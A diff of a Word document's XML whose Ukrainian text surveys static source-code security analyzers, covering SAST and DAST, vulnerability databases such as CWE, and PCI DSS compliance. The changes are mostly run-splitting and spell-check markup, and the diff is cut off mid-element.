           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22123,8 +24029,95 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>статичного</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>зазначити, що більшість з аналізаторів відносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити різні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22134,7 +24127,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>туп до вихідних текстів відсутн</w:t>
+        <w:t xml:space="preserve">туп до вихідних текстів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ідсутн</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -22155,8 +24170,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів відповідності та можливість виконання вимог різних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім світом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей </w:t>
-      </w:r>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22165,9 +24181,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>(підвантажуваних модулів, використовуваного стороннього</w:t>
-      </w:r>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22176,6 +24192,82 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>св</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ідвантажуваних модулів, використовуваного стороннього</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t xml:space="preserve"> програмного забезпечення і т. д</w:t>
       </w:r>
       <w:r>
@@ -22186,7 +24278,29 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття рішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
+        <w:t xml:space="preserve">.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по автоматичному виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ішення по прийманню та впровадження розробленого коду або відправки його на доопрацювання. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22207,6 +24321,7 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -22289,8 +24404,9 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують різні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і досліджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. Якість власної бази - один з ключових критеріїв, що впливає на загальну якість роботи продукту. Крім того, власна база повинна бути динамічною і постійно оновлюваною - нові вектори атак і експлуатації вразливостей, а також зміни в мовах програмування і методи розробки вимагають від розробників аналізаторів виконувати постійні оновлення бази для збереження високої якості перевірки. Продукти зі статичної неоновлюваної базою найчастіше програють в порівняльних тестах. </w:t>
-      </w:r>
+        <w:t xml:space="preserve">. Алгоритм роботи аналізатора вихідних кодів При проведенні оцінки вихідних текстів аналізатори використовують </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -22299,8 +24415,227 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t>р</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ізні бази даних, що містять опис вразливостей і помилок програмування: Власна база вразливостей і помилок програмування - у кожного розробника аналізаторів вихідних кодів є свої відділи аналітики і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>досл</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">іджень, які готують спеціалізовані бази для аналізу вихідних текстів програм. Якість власної бази - один з ключових критеріїв, що впливає на загальну якість роботи продукту. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ім того, власна база повинна бути динамічною і постійно оновлюваною - нові вектори атак і експлуатації вразливостей, а також зміни в мовах програмування і методи розробки вимагають від розробників аналізаторів виконувати постійні оновлення бази для збереження високої якості перевірки. Продукти зі статичної неоновлюваної базою найчастіше програють </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>пор</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">івняльних тестах. Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>п</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> області розробки і захисту програмного забезпечення. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Державні бази помилок програмування - існує ряд державних баз вразливостей, складанням і підтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів в області розробки і захисту програмного забезпечення. Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду. Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. Крім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продуктів.</w:t>
+        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Від того, які бази використовуються в аналізаторі, безпосередньо залежить якість проведення аналізу, кількість помилкових спрацьовувань і пропущених помилок. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Кр</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22655,7 +24990,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -22905,6 +25239,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>П</w:t>
       </w:r>
       <w:r>
@@ -23006,6 +25341,7 @@
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -23014,7 +25350,18 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Підтримка</w:t>
+        <w:t>П</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ідтримка</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -23114,7 +25461,59 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> містить перелік вразливостей, відсортованих за ступенем їх небезпеки (на першому місці найнебезпечніший тип вразливостей). Список не включає в себе всі можливі типи вразливостей, крім того, часто буває, що ту чи іншу вразливість можна віднести відразу до декількох категорій.</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
